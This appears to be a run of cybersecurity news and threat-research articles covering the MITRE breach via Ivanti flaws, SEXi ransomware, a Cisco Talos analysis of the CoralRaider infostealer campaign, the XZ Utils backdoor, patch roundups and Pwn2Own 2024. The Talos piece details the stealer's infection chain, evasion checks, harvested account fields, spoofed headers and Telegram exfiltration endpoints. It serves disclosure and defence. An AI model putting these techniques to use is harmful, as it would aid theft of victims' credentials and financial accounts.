The irony is lost on few, as a nation-state threat actor used eight MITRE techniques to breach MITRE itself — including exploiting the Ivanti bugs that attackers have been swarming on for months.

Source: Kristoffer Tripplaar via Alamy Stock Photo

Foreign nation-state hackers have used vulnerable Ivanti edge devices to gain three months' worth of "deep" access to one of MITRE Corp.'s unclassified networks.

MITRE, steward of the ubiquitous ATT&CK glossary of commonly known cyberattack techniques, previously went 15 years without a major incident. The streak snapped in January when, like so many other organizations, its Ivanti gateway devices were exploited.

The breach affected the Networked Experimentation, Research, and Virtualization Environment (NERVE), an unclassified, collaborative network the organization uses for research, development, and prototyping. The extent of the NERVE damage (pun intended) is currently being assessed.

Dark Reading reached out to MITRE to confirm the timeline and details of the attack. MITRE did not provide further clarification.

**MITRE's ATT&CK**

Stop me if you've heard this one before: In January, after an initial reconnaissance period, a threat actor exploited one of the company's virtual private networks (VPNs) through two Ivanti Connect Secure zero-day vulnerabilities (ATT&CK technique T1190, Exploit Public-Facing Applications).

According to a blog post from MITRE's Center for Threat-Informed Defense, the attackers bypassed the multifactor authentication (MFA) protecting the system with some session hijacking (MITRE ATT&CK T1563, Remote Service Session Hijacking).

They attempted to leverage several different remote services (T1021, Remote Services), including the Remote Desktop Protocol (RDP) and Secure Shell (SSH), to gain access to a valid administrator account (T1078, Valid Accounts). With it, they pivoted and "dug deep" into the network's VMware virtualization infrastructure.

There, they deployed Web shells (T1505.003, Server Software Component: Web Shell) for persistence, and backdoors to run commands (T1059, Command and Scripting Interpreter) and steal credentials, exfiltrating any stolen data to a command-and-control server (T1041, Exfiltration Over C2 Channel). To hide this activity, the group created its own virtual instances to run within the environment (T1564.006, Hide Artifacts: Run Virtual Instance).

**MITRE's Defense**

"The impact of this cyberattack should not be taken lightly," says Darren Guccione, CEO and co-founder at Keeper Security, highlighting "both the foreign ties of the attackers and the ability of the attackers to exploit two serious zero-day vulnerabilities in their quest to compromise MITRE’s NERVE, which could potentially expose sensitive research data and intellectual property."

He posits, "Nation-state actors often have strategic motivations behind their cyber operations, and the targeting of a prominent research institution like MITRE, that works on behalf of the US government, could be just one component of a larger effort."

Whatever its goals were, the hackers had ample time to carry them out. Though the compromise occurred in January, MITRE was only able to detect it in April, leaving a quarter-year gap in between.

"MITRE followed best practices, vendor instructions, and the government’s advice to upgrade, replace, and harden our Ivanti system," the organization wrote on Medium, "but we did not detect the lateral movement into our VMware infrastructure. At the time we believed we took all the necessary actions to mitigate the vulnerability, but these actions were clearly insufficient."

Editor's note: An earlier version of the story attributed the attacks to UNC5221. That attribution has not been made at this time.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

MITRE ATT&amp;CKED: InfoSec's Most Trusted Name Falls to Ivanti Bugs

A Babuk variant has been involved in at least four attacks on VMware EXSi servers in the last six weeks, in one case demanding $140 million from a Chilean data center company.

Source: Don McBailey/Stockimo via Alamy Stock Photo

What appears to be a fresh variant of the Babuk ransomware has emerged to attack VMware ESXi servers in several countries, including a confirmed hit on IxMetro PowerHost, a Chilean data center hosting company. The variant calls itself "SEXi," a play on its target platform of choice.

According to CronUp cybersecurity researcher Germán Fernández, PowerHost CEO Ricardo Rubem issued a statement confirming that a new ransomware variant had locked up the company's servers using the .SEXi file extension, with the initial access vector to the internal network as yet unknown. The attackers requested $140 million in ransom, which Rubem indicated would not be paid.

SEXi's emergence stands at the crossroads of two major ransomware trends: the rash of threat actors who have developed malware based on the Babuk source code; and a lust for compromising tantalizingly juicy VMware EXSi servers.

**IX PowerHost Attack Part of Wider Ransomware Campaign**

Meanwhile, Will Thomas, CTI researcher at Equinix, uncovered what he believes to be a binary related to that used in the attack, dubbed "LIMPOPOx32.bin" and tagged as a Linux version of Babuk in VirusTotal. At press time, that malware has a 53% detection rate on VT, with 34 out of 64 security vendors flagging it as malicious since it was first uploaded on Feb. 8. MalwareHunterTeam spotted it back on Valentine's Day, when it was being used without the "SEXi" handle in an attack on an entity in Thailand.

But Thomas further discovered other, related binaries. As he tweeted, "SEXi ransomware attack on IXMETRO POWERHOST linked to broader campaign that has hit at least three Latin American countries." These call themselves Socotra (used in an attack in Chile on March 23); Limpopo again (used in an attack in Peru on Feb. 9); and Formosa (used in an attack in Mexico on Feb. 26). Concerningly, at press time all three registered zero detections in VT.

Together, the findings showcase the development of a novel campaign using various SEXi iterations that all lead back to Babuk.

**Shadowy TTPs Emerge in SEXi Attacks**

There's no indication of where the malware operators originate from or what their intentions are. But slowly a set of tactics, techniques, and procedures are emerging. For one, the binaries' nomenclature comes from place names. Limpopo is the northernmost province of South Africa; Socotra is a Yemeni island in the Indian Ocean; and Formosa was a short-lived republic located on Taiwan in the late 1800s, after China's Qing Dynasty ceded its rule over the island.

And, as MalwareHunterTeam pointed out on X, "maybe interesting / worth to mention about this 'SEXi' ransomware that the communication method specified by the actors in the note is Session. While we\['ve\] seen some actors using it even years ago already, I \[don't\] remember seeing it in relation to any big/serious cases/actors."

Session is a cross-platform, end-to-end encrypted instant messaging application emphasizing user confidentiality and anonymity. The ransom note in the IX PowerHost attack urged the company to download the app and then send a message with the code "SEXi"; the earlier note in the Thai attack urged the Session download but to include the code "Limpopo."

**EXSi Is Sexy to Cyberattackers**

VMware's EXSi hypervisor platform runs on Linux and Linux-like OS, and can host multiple, data-rich virtual machines (VMs). It has been a popular target for ransomware actors for years now, partly because of the size of the attack surface: There are tens of thousands of ESXi servers exposed to the Internet, according to a Shodan search, with most of them running older versions. And that doesn't take into account those that are reachable after an initial access breach of a corporate network.

Also contributing to ransomware gangs' growing interest in EXSi, the platform doesn't support any third-party security tooling.

"Unmanaged devices such as ESXi servers are a great target for ransomware threat actors," according to a report from Forescout released last year. "That's because of the valuable data on these servers, a growing number of exploited vulnerabilities affecting them, their frequent Internet exposure and the difficulty of implementing security measures, such as endpoint detection and response (EDR), on these devices. ESXi is a high-yielding target for attackers since it hosts several VMs, allowing attackers to deploy malware once and encrypt numerous servers with a single command."

VMware has a guide for securing EXSi environments. Specific suggestions include: Make sure ESXi software is patched and up-to-date; harden passwords; remove servers from the Internet; monitor for abnormal activities on network traffic and on ESXi servers; and ensure there are backups of the VMs outside the ESXi environment to enable recovery.

**About the Author(s)**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

SEXi Ransomware Desires VMware Hypervisors in Ongoing Campaign

Cisco Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries.

**CoralRaider targets victims’ data and social media accounts**

Thursday, April 4, 2024 08:00

*   Cisco Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. 
*   This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts.
*   They use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads in the campaign we analyzed.
*   The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe 

**CoralRaider operators likely based in Vietnam **

Talos assesses with high confidence that the CoralRaider operators are based in Vietnam, based on the actor messages in their Telegram C2 bot channels and language preference in naming their bots, PDB strings, and other Vietnamese words hardcoded in their payload binaries. The actor’s IP address is located in Hanoi, Vietnam. 

 Our analysis revealed that the actor uses a Telegram bot, as a C2, to exfiltrate the victim’s data. This allowed us to collect information and uncover several invaluable indicators about the origin and activities of the attacker. 

The attacker used two Telegram bots: A “debug” bot for debugging, and an “online” bot where victim data was received. However, a Desktop image in the “debug” bot had a similar desktop and Telegram to the “online” bot. This showed that the actor possibly infected their own environment while testing the bot. 

Analyzing the images of the actor’s Desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named “Kiém tien tử Facebook,” “Mua Bán Scan MINI,” and “Mua Bán Scan Meta.” Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded. 

In an image from the “debug bot,” we spotted the Windows device ID (HWID) and an IP address (118\[.\]71\[.\]64\[.\]18), located in Hanoi, Vietnam, that is likely to be CoralRaider’s IP address.

Talos’ research uncovered two other images that revealed a few folders on their OneDrive. One of the folders had a Vietnamese name, “Bot Export Chiến,” which is the same as one of the folders in the PDB strings of their loader component. Pivoting on the folder path in the PDB string, we discovered a few other PDB strings having similar paths but different Vietnamese names. We analyzed the discovered samples with the PDB strings and found they belong to the same loader family, RotBot. The Vietnamese name in the PDB string of the loader binary further strengthens our assessment that CoralRaider is of Vietnamese origin.

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Khuê\\14.225.210.XX-Khue-Ver 2.0\\GPT\\bin\\Debug\\spoolsv.pdb

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Trứ\\149.248.79.205 - NetFrame 4.5 Run Dll - 2024\\ChromeCrashServices\\obj\\Debug\\FirefoxCrashSevices.pdb

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Trứ\\139.99.23.9-NetFrame4.5-Ver2.0-Trứ\\GPT\\bin\\Debug\\spoolsv.pdb

  

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Chiến\\14.225.210.XX-Chiến -Ver 2.0\\GPT\\bin\\Debug\\spoolsv.pdb

  

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Trứ\\139.99.23.9-NetFrame4.5-Ver2.0-Trứ\\GPT\\bin\\Debug\\SkypeApp.pdb

  

D:\\ROT\\ROT\\Build rot Export\\2024\\Bot Export Chiến\\14.225.210.XX-Chiến -Ver 2.0\\GPT\\bin\\Debug\\spoolsv.pdb

  

D:\\ROT\\ROT\\ROT Ver 5.5\\Source\\Encrypted\\Ver 4.8 - Client Netframe 4.5\\XClient\\bin\\Debug\\AI.pdb

  

Another image we analyzed is an Excel spreadsheet that likely contained the victims’ data. We have redacted the images to maintain confidentiality. The spreadsheet has several tabs in Vietnamese, and their English translation showed us the tabs “Employee salary spreadsheet,” “advertising costs,” “website to buy copies,” “PayPal related,” and “can use.” The spreadsheet seemed to have multiple versions — the first was created on May 10, 2023. We also spotted that they have logged into their Microsoft Office 365 account with the display name “daloia krag” while accessing the spreadsheet, and CoralRaider likely operates the account. 

CoralRaider’s payload, XClient stealer analysis, showed us a few more indicators. CoralRaider had hardcoded Vietnamese words in several stealer functions of their payload XClient stealer. The stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration. One example function we observed is used to steal the victim’s Facebook Ads account that has hardcoded with Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created, etc.

**The campaign  **

Talos observed that CoralRaider is conducting a malicious campaign targeting victims in multiple countries in Asia and Southeast Asia, including India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam. 

The initial vector of the campaign is the Windows shortcut file. We are unclear on the technique the actor used to deliver the LNKs to the victims. Some of the shortcut file filenames that we observed during our analysis are:

*   자세한 비디오 및 이미지.lnk
*   設計內容+我的名片.lnk
*   run-dwnl-restart.lnk
*   index-write-upd.lnk
*   finals.lnk
*   manual.pdf.lnk
*   LoanDocs.lnk
*   DoctorReferral.lnk
*   your-award.pdf.lnk
*   Research.pdf.lnk
*   start-of-proccess.lnk
*   lan-onlineupd.lnk
*   refcount.lnk

We also discovered a few notable unique drive serial numbers from the metadata of the Windows Shortcut files:

*   A0B4-2B36
*   FA4C-C31D
*   94AA-CEFB
*   46F7-AF3B

The attack begins when a user opens a malicious Windows shortcut file, which downloads and executes an HTML application file (HTA) from an attacker-controlled download server. The HTA file executes an embedded obfuscated Visual Basic script. The malicious Visual Basic script executes an embedded PowerShell script in the memory, which decrypts and sequentially executes three other PowerShell scripts that perform anti-VM and anti-analysis checks, bypass the User Access Controls, disables the Windows and application notifications on the victim’s machine, and finally downloads and run the RotBot. 

RotBot, the QuasarRAT client variant, in its initial execution phase, performs several detection evasion checks on the victim machine and conducts system reconnaissance. RotBot then connects to a host on a legitimate domain, likely controlled by the threat actor, and downloads the configuration file for the RotBot to connect to the C2. CoralRaider uses the Telegram bot as the C2 channel in this campaign. 

After connecting to the Telegram C2, RotBot loads the payload XClient stealer onto the victim memory from its resource and runs its plugin program. The XClient stealer plugin performs anti-VM and anti-virus software checks on the victim's machine. It executes its functions to collect the victim's browser data, including cookies, stored credentials, and financial information such as credit card details. It also collects the victim’s data from social media accounts, including Facebook, Instagram, TikTok business ads, and YouTube. It also collects the application data from the Telegram desktop and Discord application on the victim's machine. The stealer plugin can capture screenshots of the victim’s desktop and save them as a PNG file in the victim's machine’s temporary folder. With PNG files, the stealer plugin dumps the collected victim’s data from the browser and social media accounts in a text file and creates a ZIP archive. The PNG and ZIP files are exfiltrated to the attacker's Telegram bot C2.

Infection flow diagram.

**RotBot loads and runs the payload  **

RotBot, a remote access tool (RAT) compiled on Jan. 9, 2024, is downloaded and runs on the victim machine disguised as a Printer Subsystem application “spoolsv.exe.” RotBot is a variant of the QuasarRAT client that the threat actor has customized and compiled for this campaign. 

During its initial execution, RotBot performs several checks on the victim’s machine to evade detection, including IP address, ASN number, and running processes of the victim’s machine. It performs reconnaissance of system data on the victim machine. It also configures the internet proxy on the victim machine by modifying the registry key: 

Software\\Microsoft\\Windows\\CurrentVersion\\Internet 

Settings with the values:

ProxyServer = 127.0.0.1:80

ProxyEnable = 1

We observed that RotBot discovered in this campaign creates mutex in the victim machine as the infection markers​​ using the hardcoded strings in the binary.

RotBot loads and runs the XClient stealer module from its resources and uses the configuration parameters for its Telegram C2 bot from the downloaded configuration file. 

The XClient stealer sample we analyzed in this campaign is a .Net executable compiled on Jan. 7, 2024. It has extensive information-stealing capability through its plugin module and various modules for performing remote administrative tasks. 

XClient stealer has three primary functions that help it to avoid the radar. First, it will do virtual environment evasion if the victim’s machine runs in VMware or VirtualBox. It also checks if a DLL called sbieDll.dll exists in the victim machine file system to detect if it runs in the Sandboxie environment. XClient stealer also checks if anti-virus software, including AVG, Avast, and Kaspersky, is running on the victim’s machine. 

After bypassing all the checking functions, the XClient stealer captures the victim’s machine screenshot, saves it with the “.png” extension in the victim’s temporary user profile folder, and sends it to C2 through the URL “/sendPhoto.” 

XClient stealer steals victims’ social media web application credentials, browser data, and financial information such as credit card details. It targets Chrome, Microsoft Edge, Opera, Brave, CocCoc, and Firefox browser data files through the absolute paths of the respective browser installation paths. It extracts the contents of the browser database to a text file in the victim’s profile local temporary folder. 

XClient stealer hijacks and steals various Facebook data from the victim’s Facebook account. It sets custom HTTP header metadata along with the victim’s stolen Facebook cookie, and the username sends requests to Facebook APIs through the URLs below.

It checks if the victim’s Facebook is a business or ads account and uses regular expressions to search for access\_token, assetID, and paymentAccountID. Using Facebook graph API, XClient attempts to collect an extensive list of information from the victim’s account, shown in the table below.

Entities

Value place holders

facebook\_pages

verification\_status, fan\_count, followers\_count, is\_owned, name, is\_published,is\_promotable, parent\_page, promotion\_eligible, has\_transitioned\_to\_new\_page\_experience, picture, roles

Adaccounts, businesses

name, permitted\_roles, can\_use\_extended\_credit, primary\_page, wo\_factor\_type, client\_ad\_accounts, verification\_status, id, created\_time, is\_disabled\_for\_integrity\_reasons, sharing\_eligibility\_status, allow\_page\_management\_in\_www, timezone\_id, timezone\_offset\_hours\_utc

owned\_ad\_accounts

id, currency, timezone\_offset\_hours\_utc, timezone\_name,adtrust\_dsl

Business\_users

name, account\_status, account\_id, owner\_business, created\_time, next\_bill\_date, currency, timezone\_name, timezone\_offset\_hours\_utc, business\_country\_code, disable\_reason, adspaymentcycle{threshold\_amount}, has\_extended\_credit, adtrust\_dsl, funding\_source\_details, balance, is\_prepay\_account, owner

XClient stealer also collects the financial information from the victims’ Facebook business and ads accounts.

Payment related entities

Value Place holders

pm\_credit\_card

display\_string, exp\_month, exp\_year, is\_verified

payment\_method\_direct\_debits

address, can\_verify, display\_string, s\_awaiting, is\_pending,

status

payment\_method\_paypal

email\_address

payment\_method\_tokens

Current\_balance, original\_balance, time\_expire, type

amount\_spent, userpermissions

user, role

 Using the graph API, XClient stealer retrieves victims’ account friend list details and pictures. 

XClient stealer also targets the victim’s Instagram account and YouTube accounts through the URLs and collects various information, including username, badge\_count, appID, accountSectionListRenderer, contents, title, data, actions, getMultiPageMenuAction, menu, multiPageMenuRenderer, sections and hasChannel. It collects the application data from the Telegram desktop and Discord application on the victim’s machine. XClient also collects the data from the victim’s TikTok business account and checks for business ads. 

Talos compiled the hardcoded HTTP request header metadata the XClient stealer uses in this campaign while retrieving the victim’s information from Facebook, Instagram, and YouTube accounts. 

Facebook

*   sec-ch-ua-mobile: ?0
    
*   sec-ch-ua-platform: \\"Windows\\"
    
*   sec-fetch-dest: document
    
*   sec-fetch-mode: navigate
    
*   sec-fetch-site: none
    
*   sec-fetch-user: ?1
    
*   upgrade-insecure-requests: 1
    
*   user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
    
*   sec-ch-ua: \\"Not?A\_Brand\\";v=\\"8\\", \\"Chromium\\";v=\\"108\\", \\"Google Chrome\\";v=\\"108\\"
    
*   sec-ch-ua-mobile: ?0
    

  

Instagram

*   Sec-Ch-Prefers-Color-Scheme: light
    
*   Sec-Ch-Ua: "Google Chrome"; v = "113", "Chromium"; v = "113", "Not-A.Brand"; v = "24"
    
*   Sec-Ch-Ua-Full-Version-List: "Google Chrome"; v = "113.0.5672.127", "Chromium"; v = "113.0.5672.127", "Not-A.Brand"; v = "24.0.0.0"
    
*   Sec-Ch-Ua-Mobile: ?0
    
*   Sec-Ch-Ua-Platform: "Windows"
    
*   Sec-Ch-Ua-Platform-Version: "10.0.0"
    
*   Sec-Fetch-Dest: document
    
*   Sec-Fetch-Mode: navigate
    
*   Sec-Fetch-Site: none
    
*   Sec-Fetch-User: ?1
    
*   Upgrade-Insecure-Requests: 1
    
*   User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36(KHTML, like Gecko) Chrome / 113.0.0.0 Safari / 537.36
    

  

Youtube

*   content-type: application/json
    
*   sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not-A.Brand";v="24"
    
*   sec-ch-ua-arch: "x86"
    
*   sec-ch-ua-bitness: "64"
    
*   sec-ch-ua-full-version: "113.0.5672.127"
    
*   sec-ch-ua-full-version-list: "Google Chrome";v="113.0.5672.127", "Chromium";v="113.0.5672.127", "Not-A.Brand";v="24.0.0.0"
    
*   sec-ch-ua-mobile: ?0
    
*   sec-ch-ua-model: ""
    
*   sec-ch-ua-platform: "Windows"
    
*   sec-ch-ua-platform-version: "10.0.0"
    
*   sec-ch-ua-wow64: ?0
    
*   sec-fetch-dest: empty
    
*   sec-fetch-mode: same-origin
    
*   user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
    
*   x-goog-authuser: 0
    
*   x-origin: https://www.youtube.com
    
*   x-youtube-bootstrap-logged-in: true
    
*   x-youtube-client-name: 1
    

Finally, the XClient stealer stores the victim’s social media data, which is collected into a text file in the local user profile temporary folder and creates a ZIP archive. The ZIP files were exfiltrated to the Telegram C2 through the URL “/sendDocument”.

Talos’ research of this campaign focused on discovering and disclosing a new threat actor of Vietnamese origin and their payloads. Additional technical details of the attack chain components of this campaign can be found in the report published by the researchers at QiAnXin Threat Intelligence Center. 

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SID for this threat is 63192.

ClamAV detections are also available for this threat:

Lnk.Downloader.CoralRaider-10024620-0

Html.Downloader.CoralRaider-10025101-0

Win.Trojan.RotBot-10024631-0

Win.Infostealer.XClient-10025106-2

**Indicators of Compromise**

Indicators of Compromise associated with this threat can be found here.

CoralRaider targets victims’ data and social media accounts

By Waqas
Critical Backdoor Alert! Patch XZ Utils Now (CVE-2024-3094) & Secure Your Linux System. Learn how a hidden backdoor…
This is a post from HackRead.com Read the original post: Backdoor Discovered in XZ Utils: Patch Your Systems Now (CVE-2024-3094)

Critical Backdoor Alert! Patch XZ Utils Now (CVE-2024-3094) & Secure Your Linux System. Learn how a hidden backdoor puts Linux at risk and how to patch it immediately.

A critical security vulnerability, designated CVE-2024-3094, was recently discovered in the widely used XZ Utils package. This vulnerability threatens Linux systems with backdoor attacks.

For your information, XZ Utils is a collection of open-source command-line tools for data compression and decompression. It includes the popular xz command and the liblzma library, which is used by other software, most notably OpenSSH – the program that enables secure remote access to Linux systems.

****The Backdoor Explained****

The vulnerability involved a malicious backdoor hidden within the source code of XZ Utils, specifically in the liblzma library. This backdoor code, if triggered, could allow an attacker to gain unauthorized remote access to a vulnerable system through SSH. The attacker wouldn’t even need valid credentials, potentially granting complete control over the system.

****Impact and Discovery****

The potential impact of this vulnerability is severe. An attacker exploiting CVE-2024-3094 could steal sensitive data, install malware, disrupt critical operations, or even use the compromised system to launch further attacks.

Fortunately, the backdoor was discovered by the security community in late March 2024 before widespread distribution. This prevented a large-scale security breach. However, some Linux users remain vulnerable, especially those using unstable or rolling-release distributions.

****Who is Affected?****

According to OpenSSH’s report, the specific versions of XZ Utils containing the backdoor were 5.6.0 and 5.6.1. These versions were only recently released and did not make it into the stable branches of most major Linux distributions. However, users who manually compiled these versions from source code or installed them from non-standard repositories could be at risk.

Commenting on this, John Bambenek, President at Bambenek Consulting warned, _“_The original reports of this backdoor showed exploitation of this vulnerability via SSH which means it can be triggered even if the victim machine’s users don’t use XZ and its library. It seems this library tends to be installed by default on modern Linux distributions so organizations should immediately prioritize downgrading the package until a safe update is released, even if they don’t use the tools themselves._“_

****Mitigation and Prevention****

The most critical step to address this vulnerability is to update your system immediately. Most Linux distributions have released patch updates for XZ Utils. Here’s how to update depending on your distribution:

*   **Debian/Ubuntu:** Use sudo apt update and sudo apt upgrade commands.
*   **Red Hat/CentOS/Fedora:** Use sudo dnf update command.
*   **Other Distributions:** Refer to your distribution’s specific update instructions.

****Lessons Learned****

The discovery of CVE-2024-3094 emphasizes the importance of various security measures. Firstly, keeping software and systems updated with regular patches is crucial to mitigate potential risks.

Secondly, maintaining a sharp review process for open-source projects aids in the early detection of vulnerabilities. Thirdly, promoting security awareness among users and employees through education about risks and best practices is essential for enhancing overall protection. Adhering to these practices enables us to reduce the impact of vulnerabilities like CVE-2024-3094 and safeguard the security of our systems.

1.  New Linux Malware Alert: ‘Spinning YARN’ Hits Docker
2.  Crypto Stealing PyPI Malware Hits Windows, Linux Users
3.  Magnet Goblin Using Ivanti Flaws to Deploy Linux Malware
4.  Bifrost RAT Variant Hits Linux Devices, Mimics VMware Domain
5.  Xamalicious Backdoor Infects Android Apps, Affects 327K Devices

Backdoor Discovered in XZ Utils: Patch Your Systems Now (CVE-2024-3094)

Plus: Microsoft patches over 60 vulnerabilities, Mozilla fixes two Firefox zero-day bugs, Google patches 40 issues in Android, and more.

It’s time to check your software updates. March has seen the release of important patches for Apple’s iOS, Google’s Chrome, and its privacy-conscious competitor Firefox. Bugs have also been squashed by enterprise software giants including Cisco, VMware, and SAP.

Here’s what you need to know about the security updates issued in March.

**Apple iOS**

Apple made up for a quiet February by issuing two separate patches in March. At the start of the month, the iPhone maker released iOS 17.4, fixing over 40 flaws including two issues already being used in real-life attacks.

Tracked as CVE-2024-23225, the first bug in the iPhone Kernel could allow an attacker to bypass memory protections. “Apple is aware of a report that this issue may have been exploited,” the iPhone maker said on its support page.

Tracked as CVE-2024-23296, the second flaw, in RTKit, the real-time operating system used in devices including AirPods, could also allow an adversary to bypass Kernel memory protections.

Later in March, Apple released a second software update, iOS 17.4.1, this time fixing two flaws in its iPhone software, both tracked as CVE-2024-1580. Using the issues patched in iOS 17.4.1, an attacker could execute code if they convinced someone to interact with an image.

Soon after issuing iOS 17.4.1, Apple released patches for its other devices to fix the same bugs: Safari 17.4.1, macOS Sonoma 14.4.1 and macOS Ventura 13.6.6.

**Google Chrome**

March was another hectic month for Google, which patched multiple flaws in its Chrome browser. Mid-way through the month, Google released 12 patches, including a fix for CVE-2024-2625, an object-lifecycle issue in V8 with a high severity rating.

Medium-severity issues include CVE-2024-2626, an out-of-bounds read bug in Swiftshader; CVE-2024-2627, a use-after-free flaw in Canvas; and CVE-2024-2628, an inappropriate implementation issue in Downloads.

At the end of the month, Google issued seven security fixes, including a patch for a critical use-after-free flaw in ANGLE tracked as CVE-2024-2883. Two further use-after-free bugs, tracked as CVE-2024-2885 and CVE-2024-2886, were given a high-severity rating. Meanwhile, CVE-2024-2887 is a type-confusion flaw in WebAssembly.

The last two issues were exploited at the Pwn2Own 2024 hacking contest, so you should update your Chrome browser ASAP.

**Mozilla Firefox**

Mozilla’s Firefox had a busy March, after patching two zero-day vulnerabilities exploited at Pwn2Own. CVE-2024-29943 is an out-of-bounds access bypass issue, while CVE-2024-29944 is a privileged JavaScript Execution flaw in Event Handlers that could lead to sandbox escape. Both issues are rated as having a critical impact.

Earlier in the month, Mozilla released Firefox 124 to address 12 security issues, including CVE-2024-2605, a sandbox-escape flaw affecting Windows operating systems. An attacker could have leveraged the Windows Error Reporter to run arbitrary code on the system, escaping the sandbox, Mozilla said.

CVE-2024-2615 sees critical-rated memory safety bugs fixed in Firefox 124. “Some of these bugs showed evidence of memory corruption, and we presume that with enough effort \[they\] could have been exploited to run arbitrary code,” Mozilla said.

**Google Android**

Google has released its March Android Security Bulletin, fixing nearly 40 issues in its mobile operating system, including two critical bugs in its system component. CVE-2024-0039 is a remote code-execution flaw, while CVE-2024-23717 is an elevation-of-privilege vulnerability.

“The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed,” Google said in its advisory.

You Should Update Apple iOS and Google Chrome ASAP

By Deeba Ahmed
Pwn2Own is back!
This is a post from HackRead.com Read the original post: Pwn2Own 2024 Awards $700k as Hackers Pwn Tesla, Browsers, and More

The Pwn2Own 2024 hacking contest saw a record-breaking first day as participants exposed critical vulnerabilities in Tesla vehicles, popular browsers, and operating systems – This highlights the ongoing challenge of securing our technology and the importance of bug bounty programs.

The Pwn2Own 2024, a hacking contest organized by Trend Micro’s Zero Day Initiative in Vancouver, saw participants earn over $700,000 on the first day through successful exploits against Tesla cars, browsers, and Linux and Windows systems. 

French cybersecurity firm Synacktiv’s hackers earned $200,000 for an integer overflow exploit targeting the Tesla ECU with CAN bus control and also won a new Tesla Model 3. It is worth noting that this was the only scheduled hacking attempt for Tesla cars for this contest. 

However, this isn’t the first time Synacktiv has dominated Pwn2Own – they previously won a car in Pwn2Own Automotive 2024. 

Tesla pwned (Screenshot: ZDI)

****About the Vulnerability****

While the specific details of the exploit remain undisclosed, as per Pwn2Own rules to allow for vendor patching, the competition organizers confirmed that a single integer overflow flaw was used. This vulnerability allowed the team to gain control of the Tesla’s CAN BUS, a crucial communication system within the car. Synacktiv exploited a Tesla ECU with Vehicle (VEH) CAN BUS Control using a single integer overflow flaw to secure their second victory in Pwn2Own competitions. 

****Day One Highlights****

On day one of the Pwn2Own contest, participants were awarded $732,500 by ZDI for reporting 19 unique zero-day vulnerabilities. Here’s the breakdown of the rewards.

Independent white-hat hacker Manfred Paul received $102,500 for remote code execution on Apple Safari using an integer underflow bug, and a PAC bypass exploiting a flaw in the same browser. Paul also executed a double-tap exploit on Chrome and Edge browsers using a rare CWE-1284 vulnerability in round two of the competition.

South Korean team Theori earned $130,000 by combining an uninitialized variable bug, a use-after-free (UAF) vulnerability, and heap-based buffer overflow to escape a VMware Workstation and execute code as system on Windows OS.

Oracle VirtualBox was targeted by REverse Tactics researchers, earning $90,000 and two researchers received $20,000 for their respective Oracle VirtualBox exploits. 

Other Pwn2Own participants earned rewards for Chrome and Edge, Safari, Adobe Reader, Windows 11 local privilege escalation, and two Ubuntu local privilege escalation exploits. 

Seunghyun Lee, AbdulAziz Hariri, and the Devcore Research team successfully exploited Google Chrome, Adobe Reader, and Windows 11 bugs, earning them $60,000, $50,000, and $30,000 respectively. Lee successfully executed an exploit on Google Chrome, Hariri completed a code execution attack, and the Devcore Research team successfully executed a local privilege escalation (LPE) attack.

Chrome browser pwned (Screenshot: ZDI)

